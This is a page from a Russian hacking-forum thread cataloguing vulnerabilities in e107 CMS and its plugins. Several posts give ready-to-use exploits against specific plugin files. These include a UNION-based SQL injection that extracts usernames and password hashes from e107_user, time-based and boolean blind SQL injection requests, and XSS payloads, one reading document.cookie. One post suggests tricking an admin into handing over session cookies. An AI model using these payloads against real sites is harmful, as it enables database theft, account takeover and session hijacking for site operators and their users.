ANTICHAT - [ Обзор уязвимостей e107 cms ]

Страница 3 из 11

Последняя »

Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)

- Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - [ Обзор уязвимостей e107 cms ] (https://forum.antichat.xyz/showthread.php?t=50683)

Nightmarе

24.10.2008 23:51

e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit
Уязвимость вышла в свет 21 октября, 2008 © securitylab.ru

Уязвимость существует из-за недостаточной обработки входных данных в ключах массива "ue[]" в сценарии usersettings.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Сам эекслойт под неё:
http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F361578.php

Ну и вопрос, кто нибудь знает как закрыть дырку?

Nightmarе

29.10.2008 05:53

e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit

e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit

Сплойт:
http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F361979.php

KentPol

31.10.2008 23:04

SQL-инъекция в e107 Plugin lyrics_menu

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «l_id» сценарием lyrics_song.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

PHP код:


		
			
http://localhost/script_path/lyrics_song.php?l_id=[SQL1] or [SQL2]



[SQL1] = column number 15



-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+e107_user--

_krad_

30.11.2008 23:01

Обнаружил кривую обработку смайлов. Возможна XSS-атака

Код:

!<script>alert(document.cookie);</script>

Версию e107 еще уточню.

ZAMUT

01.12.2008 00:31

Уточняй, где конкертно возможно провести xss

Что - то мне подсказывает, что тестил ты под правами админа => там идет кривая обработка в функции фильтрации toDB.

eLWAux

15.12.2008 00:31

Уязвимости модулей e107

http://aidarjan.com/e107_images/logo_template.pnge107

e107 mam_menu Component Blind-SQLinj
http://e107.ru/e107_files/downloads/mam_menu2.tar.gz

Уязвимый продукт: e107 mam_menu2 (Управление аккаунтами)
Версия: e107 0.7.13, mam_menu2 v1.01

1. Blind sqlInjection
Уязвимость в файле ban.php
Уязвимый кусок кода:

PHP код:


		
			
$unban = $_GET['accunban'];

if ( $unban ){

    mysql_query("UPDATE $TABLE SET user_ban = '0' WHERE user_id  = $unban");

} else {};

Из кода видно, что параметр $unban не обрамляется в кавычки и ранее нигде не фильтруется - это даёт нам возможность провести sql инъекцию.
Так же из кода видно, что данные в таблице обновляютса и не выводятся - это и есть причина слепоты в данной инъекции.

Exploit:

Цитата:

для версии 5: true: /e107_plugins/mam_menu/allaccess/unreg.php?accunban=1+and+if(SUBSTRING(VERSION(),1, 1)=5,1,sleep(4))=1
для версии 5: false: /e107_plugins/mam_menu/allaccess/unreg.php?accunban=1+and+if(SUBSTRING(VERSION(),1, 1)=4,1,sleep(4))=1

данний exploit будет работать только под версии >=5 (причина: визов ф-ции sleep), для более ранних версий надо использовать BENCHMARK

Скрипт для работы со слепыми инъекциями от Grey:
https://forum.antichat.ru/showpost.php?p=894169&postcount=5

eLWAux

15.12.2008 00:31

e107 Easy Members Search v1.0+ XSS
http://e107.org.ru/download.php?view.149

Уязвимый продукт: Easy Members Search v1.0+
Версия: v1.0+
Условия: magic quotes off

1. XSS
Уязвимость в файле ems.php
Уязвимый кусок кода:

PHP код:


		
			
$usrname  = $_GET['usrname'];

.........

<input class='tbox' style='width:120px;' type='text' name='usrname' value='".$usrname."' /></td>

xss атаку можна произвести из за недостаточной фильтации в файлах class2.php и ems.php

Exploit:

Цитата:

/e107_plugins/ems/ems.php?usrname=test' />sa<b><b
/e107_plugins/ems/ems.php?usrname=test' /><script>alert('xss')</script>
/e107_plugins/ems/ems.php?usrname=test' /><script>alert(/xss/)</script>
/e107_plugins/ems/ems.php?usrname=test' /><script>alert(/xss/)</script><b><b

eLWAux

15.12.2008 00:32

e107 roll_mini v1.2 (каталог терминов) XSS
http://e107.org.ru/download.php?view.221

Уязвимый продукт: roll_mini (каталог терминов)
Версия: v1.2
Условия: magic quotes off

1. XSS
Уязвимость в файле roll.php
Уязвимый кусок кода:

PHP код:


		
			
if ($_GET['cat']) $id_cat = $_GET['cat']; else $id_cat = "1";

if ($_GET['search']) $search = $_GET['search'];

.........

<input class='tbox' type='hidden' name='cat' size='30' value='".$id_cat."' >

<input class='tbox' type='text' name='search' size='30' value='".$search."' >

xss атаку можна произвести из за отсуствия фильтации в файле roll.php

Exploit:

Цитата:

/e107_plugins/roll_mini/roll.php?cat=1aaaa<script>alert('xss')</script>

eLWAux

15.12.2008 20:10

coppermine_menu (фотогаллерея) Blind sqlInj
http://web.wilan.com.ru/modules.php?name=Files&go=view_file&lid=115

Уязвимый продукт: coppermine_menu (фотогаллерея)
Версия: v0.3.3

Blind sqlInj
Уязвимость в файле util.php
Уязвимый кусок кода:

PHP код:


		
			
$action = $_POST['action'];

....

function filenametotitle($delete)

{

    $albumid = $_POST['albumid'];

    $parsemode = $_POST['parsemode'];

    ....

    $query = "SELECT * FROM $picturetbl WHERE aid = '$albumid'";

    $result = MYSQL_QUERY($query);

    $num = mysql_numrows($result);

}

......

} else if ($action == 'title') { ....

filenametotitle(0); ..}

........

sqlInj атаку можна произвести из за отсуствия фильтации в POST запросе данних action, albumid

Exploit:

Цитата:

true: \e107_plugins\coppermine_menu\util.php
POST: action=title&albumid=0' 1'='1&parsemode=2

false: \e107_plugins\coppermine_menu\util.php
POST: action=title&albumid=0' 1'='2&parsemode=2

eLWAux

15.12.2008 21:02

EasyShop adminXSS
http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.461

Уязвимый продукт: EasyShop
Условия: нужни права админа(єсли использовать СИ, то можно заставить админа отправить тебе свои куки..))

XSS
Уязвимость в файле admin_main_categories_edit.php
Уязвимый кусок кода:

PHP код:


		
			
..

} else if ($_GET['delete_main_category'] == '1') {

<a href='admin_main_categories_edit.php?delete_main_category=2&main_category_id=".$_GET['main_category_id']."'>".

...

задействовать только в совместимости с СИ

Exploit:

Цитата:

/e107_plugins/easyshop/admin_main_categories_edit.php?delete_main_categor y=1&main_category_id=1'><script>alert('xss')</script><a href='admin_main_categories_edit.php

/e107_plugins/easyshop/admin_main_categories_edit.php?delete_main_categor y=1&main_category_id=1'>XSS<temp class='a

Время: 10:31

Страница 3 из 11

Последняя »

Показывать 40 сообщений этой темы на одной странице